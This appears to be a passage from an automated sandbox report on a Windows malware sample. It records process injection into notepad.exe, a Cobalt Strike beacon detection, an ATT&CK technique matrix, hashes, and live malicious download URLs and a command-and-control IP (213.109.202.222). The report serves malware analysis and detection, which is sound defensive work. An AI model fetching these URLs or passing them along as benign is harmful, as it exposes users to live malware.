      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6928 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6776 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7884 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-GB --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8184 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Users\user\Downloads\xml.exe "C:\Users\user\Downloads\xml.exe"
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6776 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
      Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8004 CREDAT:9474 /prefetch:2
      Source: C:\Users\user\Downloads\xml.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\Downloads\857bae32-9da1-41f6-909a-b81fa10c92f3.tmpJump to dropped file
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\notepad.exe TID: 3608Thread sleep count: 40 > 30
      Source: C:\Windows\System32\notepad.exe TID: 3608Thread sleep time: -2400000s >= -30000s
      Source: C:\Windows\System32\notepad.exe TID: 3608Thread sleep count: 107 > 30
      Source: C:\Windows\System32\notepad.exe TID: 3608Thread sleep time: -6420000s >= -30000s
      Source: C:\Windows\System32\notepad.exe TID: 3608Thread sleep count: 119 > 30
      Source: C:\Windows\System32\notepad.exe TID: 3608Thread sleep time: -7140000s >= -30000s
      Source: C:\Windows\System32\notepad.exeThread delayed: delay time: 60000
      Source: C:\Windows\System32\notepad.exeThread delayed: delay time: 60000
      Source: C:\Windows\System32\notepad.exeThread delayed: delay time: 60000
      Source: C:\Users\user\Downloads\xml.exeProcess information queried: ProcessInformation

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\Downloads\xml.exeProcess created / APC Queued / Resumed: C:\Windows\System32\notepad.exe
      Source: C:\Windows\System32\notepad.exeNetwork Connect: 213.109.202.222 80
      Source: C:\Users\user\Downloads\xml.exeMemory allocated: C:\Windows\System32\notepad.exe base: 24D00770000 protect: page execute and read and write
      Source: C:\Users\user\Downloads\xml.exeMemory written: C:\Windows\System32\notepad.exe base: 24D00770000 value starts with: 4D5A
      Source: C:\Users\user\Downloads\xml.exeThread APC queued: target process: C:\Windows\System32\notepad.exe
      Source: C:\Users\user\Downloads\xml.exeMemory written: C:\Windows\System32\notepad.exe base: 24D00770000
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
      Source: C:\Users\user\Downloads\xml.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe
      Source: C:\Users\user\Downloads\xml.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Exploitation for Client Execution
      1
      Registry Run Keys / Startup Folder
      611
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Security Software Discovery
      Remote ServicesData from Local System2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      Registry Run Keys / Startup Folder
      11
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop ProtocolData from Removable Media2
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      611
      Process Injection
      Security Account Manager11
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Rundll32
      NTDS1
      File and Directory Discovery
      Distributed Component Object ModelInput Capture3
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets3
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      http://213.109.202.222/download/xml.xml100%Avira URL Cloudmalware
      http://213.109.202.222/download/xml.xml11%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\Downloads\857bae32-9da1-41f6-909a-b81fa10c92f3.tmp100%AviraHEUR/AGEN.1315826
      C:\Users\user\Downloads\857bae32-9da1-41f6-909a-b81fa10c92f3.tmp100%Joe Sandbox ML
      :sel (copy)75%ReversingLabsWin64.Backdoor.CobaltStrikeBeacon
      :sel (copy)68%VirustotalBrowse
      C:\Users\user\Downloads\857bae32-9da1-41f6-909a-b81fa10c92f3.tmp100%AviraHEUR/AGEN.1315826
      C:\Users\user\Downloads\857bae32-9da1-41f6-909a-b81fa10c92f3.tmp100%Joe Sandbox ML
      C:\Users\user\Downloads\857bae32-9da1-41f6-909a-b81fa10c92f3.tmp100%AviraHEUR/AGEN.1315826
      C:\Users\user\Downloads\857bae32-9da1-41f6-909a-b81fa10c92f3.tmp100%Joe Sandbox ML
      No Antivirus matches
      SourceDetectionScannerLabelLink
      chrome.cloudflare-dns.com0%VirustotalBrowse
      part-0012.t-0009.t-msedge.net0%VirustotalBrowse
      bzib.nelreports.net0%VirustotalBrowse
      ssl.bingadsedgeextension-prod-eastus.azurewebsites.net0%VirustotalBrowse
      sni1gl.wpc.nucdn.net0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      file:///C:/Users/user/Downloads/xml.xml0%Avira URL Cloudsafe
      http://213.109.202.222/download/xml.exe100%Avira URL Cloudmalware
      http://213.109.202.222/j.ad0%Avira URL Cloudsafe
      http://213.109.202.222/download/xml.exe20%VirustotalBrowse
      http://213.109.202.222/j.ad10%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      chrome.cloudflare-dns.com
      172.64.41.3
      truefalseunknown
      www.google.com
      142.251.40.228
      truefalse
        high
        part-0012.t-0009.t-msedge.net
        13.107.213.40
        truefalseunknown
        ssl.bingadsedgeextension-prod-eastus.azurewebsites.net
        40.71.99.188
        truefalseunknown
        googlehosted.l.googleusercontent.com
        142.250.64.65
        truefalse
          high
          sni1gl.wpc.nucdn.net
          152.195.19.97
          truefalseunknown
          clients2.googleusercontent.com
          unknown
          unknownfalse
            high
            bzib.nelreports.net
            unknown
            unknowntrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://213.109.202.222/download/xml.xmltrue
              unknown
              http://213.109.202.222/j.adtrue
              • 10%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              file:///C:/Users/user/Downloads/xml.xmlfalse
              • Avira URL Cloud: safe
              low
              http://213.109.202.222/download/xml.exetrue
              • 20%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              142.250.80.46
              unknownUnited States
              15169GOOGLEUSfalse
              13.107.6.158
              unknownUnited States
              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              13.107.246.40
              unknownUnited States
              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              4.227.249.197
              unknownUnited States
              3356LEVEL3USfalse
              152.195.19.97
              sni1gl.wpc.nucdn.netUnited States
              15133EDGECASTUSfalse
              13.107.21.200
              unknownUnited States
              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              142.251.40.228
              www.google.comUnited States
              15169GOOGLEUSfalse
              23.51.57.215
              unknownUnited States
              4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
              13.91.231.123
              unknownUnited States
              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              20.189.173.1
              unknownUnited States
              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              172.253.122.84
              unknownUnited States
              15169GOOGLEUSfalse
              23.40.179.55
              unknownUnited States
              16625AKAMAI-ASUSfalse
              162.159.61.3
              unknownUnited States
              13335CLOUDFLARENETUSfalse
              23.40.179.37
              unknownUnited States
              16625AKAMAI-ASUSfalse
              40.71.99.188
              ssl.bingadsedgeextension-prod-eastus.azurewebsites.netUnited States
              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              13.107.213.40
              part-0012.t-0009.t-msedge.netUnited States
              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              204.79.197.239
              unknownUnited States
              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              20.110.205.119
              unknownUnited States
              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              13.107.22.200
              unknownUnited States
              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              172.64.41.3
              chrome.cloudflare-dns.comUnited States
              13335CLOUDFLARENETUSfalse
              13.107.5.80
              unknownUnited States
              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              213.109.202.222
              unknownunknown
              34359UA-LINK-ASUAtrue
              20.94.153.70
              unknownUnited States
              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              104.77.10.106
              unknownUnited States
              16625AKAMAI-ASUSfalse
              13.107.42.16
              unknownUnited States
              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              142.250.64.67
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.64.65
              googlehosted.l.googleusercontent.comUnited States
              15169GOOGLEUSfalse
              20.40.24.37
              unknownUnited States
              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              142.250.65.206
              unknownUnited States
              15169GOOGLEUSfalse
              239.255.255.250
              unknownReserved
              unknownunknownfalse
              52.183.229.37
              unknownUnited States
              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              142.251.40.163
              unknownUnited States
              15169GOOGLEUSfalse
              13.107.22.239
              unknownUnited States
              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              40.74.166.188
              unknownUnited States
              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              IP
              192.168.2.17
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1400842
              Start date and time:2024-02-29 11:56:41 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsinteractivecookbook.jbs
              Sample URL:http://213.109.202.222/download/xml.xml
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:48
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • EGA enabled
              Analysis Mode:stream
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.win@112/227@12/122
              • Exclude process from analysis (whitelisted): SIHClient.exe
              • Excluded IPs from analysis (whitelisted): 142.251.40.163, 142.250.80.46, 172.253.122.84, 34.104.35.123, 20.3.187.198, 23.51.57.215
              • Excluded domains from analysis (whitelisted): e11290.dspg.akamaiedge.net, fe3.delivery.mp.microsoft.com, clients2.google.com, go.microsoft.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, go.microsoft.com.edgekey.net, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtSetValueKey calls found.
              • Report size getting too big, too many NtWriteVirtualMemory calls found.
              • Timeout during stream target processing, analysis might miss dynamic analysis data
              Process:C:\Users\user\Downloads\xml.exe
              File Type:PE32+ executable (console) x86-64, for MS Windows
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:91807225181F95317A20DF820AF456BF
              SHA1:55B5D6656A7C9A32475DD666F88FAD5A94E7745C
              SHA-256:FED4CE59E1E70926027787FDA845FDA417779E7E2CC59DC1AD7B23071BC28C07
              SHA-512:275F2A51A3B46FF4C4C95C35ED407E056018C690F3F1750DE9EB5744FC1C32153F1B4144219C8BDBB050EB273A6AE166C1288BD6E7162EF014FF2AC7E9658322
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 75%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X[..95.95.95.A..95.7G0.95.7G1.95.7G6.95.7G4.95..A4.95.94..95.F<.95.F6.95.F..95.F7.95.Rich.95.........................PE..d...vt.e.........."....$. ...........%.........@.............................@............`.................................................|?....... .......................0..X....6..p............................4..@............0...............................text............ .................. ..`.rdata..$....0.......$..............@..@.data...H....P.......@..............@....pdata..............................@..@.rsrc........ ......................@..@.reloc..X....0......................@..B........................................................................................................................................................................................................................................
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
              Category:modified
              Size (bytes):4286
              Entropy (8bit):3.8046022951415335
              Encrypted:false
              SSDEEP:
              MD5:DA597791BE3B6E732F0BC8B20E38EE62
              SHA1:1125C45D285C360542027D7554A5C442288974DE
              SHA-256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
              SHA-512:D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
              Malicious:false
              Reputation:unknown
              Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):70044
              Entropy (8bit):6.102745794169275
              Encrypted:false
              SSDEEP:
              MD5:893D24033FC2F6231E0FDE0606D00B46
              SHA1:31F911A8B90A02AB5420B8DA9A12D3B4DEA01A91
              SHA-256:724281C66C9A5BE7A28027184E5C0DAEE931231D81967083C6B5C1945B5FA55D
              SHA-512:82AA32D3E6BB62A487681703259BE077FFCA52DA97C52572C64ACBA0937F4F41048BA1D2FA4568154E77E2C13FF04D204F629A5ECAEECB983D3B1111FAF2FB37
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"90A92C92CD02041775F8D7BC7E702833090B32800126F34DB0EC361D6A3705A1\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1709204255"},"domain_actions_config":"H4sIAAAAAAAAAL19a3PktrH2X1HpU5LyQNLe5M355HeziV3Jxi5nU656T6VUIIghIYIAF5eZ4bj83083ONJKOwRmmutzPngtUXxwY6Nv6G78evmdqa1z/N/f/biRzqlaXv7510s+DFoJHpQ1/vLP//2fby4HCw+UxN9+vTS8h9cu39eN/Pd3l99chnHA3wfuguL6ZzloLmQvTYC/bbiO+MfvoEn5i6z+rsLV65e37OWbiz/8/fuPH/7xzYVWnbz4mxSd/ePFu9bZXl7dXrNr9vL1y2/ZzfWLi3/xNXfqAYbdXt3AX25v37y8/O2bx/FM2KcjkvDqR9tJMz+mp+C/2H/a8LgGjy3Uzx4/eR9H8fbt/8rk376Fyb/69tUrdvvqeO7Tn29uXl+z16+Pp/9/Pqa5LwBE9U4r6O97ZYIvf4+jdw8D/PXSS7ES7SryFa/rRHiV4wZ+uvybtY2Wh7Fd/gb0+fldJ3u7Afx/X35Qwllv1yGRzCW8
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):70301
              Entropy (8bit):6.10245768235526
              Encrypted:false
              SSDEEP:
              MD5:36CD6E538BC98682390B9A79D13E00AD
              SHA1:26A34836640FC4B1F78F98EA51118D41C76D777E
              SHA-256:AE13A6515D92730A1D76A3DAFEF696CD9A01151D2C041CD27EBF26F09611CED3
              SHA-512:9F6C48F8BB4F2FA3B14474B391E32D70408FF4A4D82A223BB3094DA778CF051996ADCE595AB1F6CB00456BFED4D55C99C2B5A1527E0F1597CE39D2A8B2FB41D2
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"90A92C92CD02041775F8D7BC7E702833090B32800126F34DB0EC361D6A3705A1\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1709204289"},"domain_actions_config":"H4sIAAAAAAAAAL19a3PktrH2X1HpU5LyQNLe5M355HeziV3Jxi5nU656T6VUIIghIYIAF5eZ4bj83083ONJKOwRmmutzPngtUXxwY6Nv6G78evmdqa1z/N/f/biRzqlaXv7510s+DFoJHpQ1/vLP//2fby4HCw+UxN9+vTS8h9cu39eN/Pd3l99chnHA3wfuguL6ZzloLmQvTYC/bbiO+MfvoEn5i6z+rsLV65e37OWbiz/8/fuPH/7xzYVWnbz4mxSd/ePFu9bZXl7dXrNr9vL1y2/ZzfWLi3/xNXfqAYbdXt3AX25v37y8/O2bx/FM2KcjkvDqR9tJMz+mp+C/2H/a8LgGjy3Uzx4/eR9H8fbt/8rk376Fyb/69tUrdvvqeO7Tn29uXl+z16+Pp/9/Pqa5LwBE9U4r6O97ZYIvf4+jdw8D/PXSS7ES7SryFa/rRHiV4wZ+uvybtY2Wh7Fd/gb0+fldJ3u7Afx/X35Qwllv1yGRzCW8
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):64323
              Entropy (8bit):6.104117387638145
              Encrypted:false
              SSDEEP:
              MD5:698EEFDAC591368102ACC7CBFBEEBE00
              SHA1:501D5D6F1FFACDC7AB7F5062FDFF264372DD6B22
              SHA-256:E9D9CAF99FD51502C1C4844EF78C43D3F6604A50504FB5951C23E8658256B33C
              SHA-512:72C79F47A5C92D4AA375F3FAC0DACF4EACBBFF01D96404654F4126D39EE0AC89B148C6D6C82871E26F03BF67EA8718B6D92F07852345C63BAC6061708B358F51
              Malicious:false
              Reputation:unknown
